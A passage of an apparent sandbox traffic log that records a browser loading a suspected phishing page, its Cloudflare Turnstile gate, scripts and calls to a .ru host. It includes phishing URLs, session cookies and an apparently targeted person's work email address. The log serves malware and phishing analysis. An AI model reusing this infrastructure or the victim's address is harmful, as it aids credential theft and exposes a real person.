brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /2DUx/ HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.itanhangasaude.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGwiLCJtYWMiOiI4ODFkOTBjYjRmMWIxOTQxMDI0NWJmZmM2MDFhM2FhZGNjNjI4ODc0NWQwZGNiNDY5ZTRhZGUzOWVhZmVhMjk3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1Host: nzd92.6gniu68.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1Host: nzd92.6gniu68.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /2DUx/ HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /2DUx/?W-crystal.begin@schulergroup.com HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjIyaWZWVjlWK2x3OHpRZTExOTYyY0E9PSIsInZhbHVlIjoiWHNialhqU2VsQU5XaEc5Z0tBTC9Xc2FJL1Y5Z2VZbHFWVHgxMWh0cFhXQTVvd3BOd2hDa0p6NzNmcXh1YUlQa3lrL3ZuYURJbUo3cXJLZkZJOWhiblIxcHIzQTFjb3lNMTNWdkVpWmJ4L1FwMmVUYU9JMVk2bGwxczhzWjJBV1ciLCJtYWMiOiJhMWUwOGM3YTg1MDZjYTE2YjM2MmFjOWZlMjZlYWE0NGVhNWZmNDRjOWJiYjIzYTEyMWZjYjA1ZWJiZTljOTdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBiU3hwRWZDMmk3a0w5VVdrak1VdGc9PSIsInZhbHVlIjoiN0pGREJJMWE3UkNMVUsrRXMrYjlwSUhQeit1SFBJZlFudllCQTBydUJUNE9pNlhLQ1BVWS9TeWFsMXVjWS9NdlRqYktzbVNWTFREbVY1MDRIT28xWDMvemZmdi95QWUxMnBhMDd6YjNzYytoR2ZIL3oyZjdHSFhkNDhWcWl0MFoiLCJtYWMiOiJhYjVkOGVmOWMzMjc3OWEyOTNkMjQ2YWJjZDIxNzM0N2MzYTBiOWRlYWM2M2MyNmU4MTA5YTJkMGYyYmUyZTQyIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikp6bWxUaVJGcWJad3NFeGtVT1Y2QlE9PSIsInZhbHVlIjoiOTlSQXB3ektMQi9UZjNWdVRycGN0WU9GeHhmU1FpUFhGajZ0cUtwQ1lmVWc4Q2lHZG9rbHZSeEVjTWNrL2JwbEllOE5ZODFGRUY1WDhjc0NUM2NXRmN2akF1MDdiK3RiL0RsSk40NkUzS2FLb1RWc2V4K2M4UE5ubngyRFM5T3oiLCJtYWMiOiJkNjU4ZThiOGIzNWFkYmVhMWM1OTVkZTBiZGEyNzgyMmIzY2IzYWJjOTczYWYxZGI5YTczMzM2MGY4ZTc4OWRmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InYxZ01pTTRXNFRrUlNONit4Zkk3YWc9PSIsInZhbHVlIjoiM0JCNUN6ckFzUGI2akx1T2U1ckJ6UWN1MVBadVo3elJYZytpK1lQV0RFTVVubmVwRHZWYjkwWk1MczBOdm1vUGJIUVRKTmxWdjFCU212dnFDNFFCTzhUT3RBdzROd3kyNkU1RWd3RFZVa0JEMVFmYWhxYVBmUlBKVytFQTlpbmIiLCJtYWMiOiIwMGIyZjU4YWRjZTlkNDA1OWM4YjY5YmVmZTQ3ZDUyZTk5OGFhNDEzNTI5NDFjZDQyODVhMzdjMmEyODViYTRjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /12TvEGAMcd3aPS6720 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /xy12R7tzrssHzef25 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /pqJEZxAGJZqUBhc85R9yzrCUwx40 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 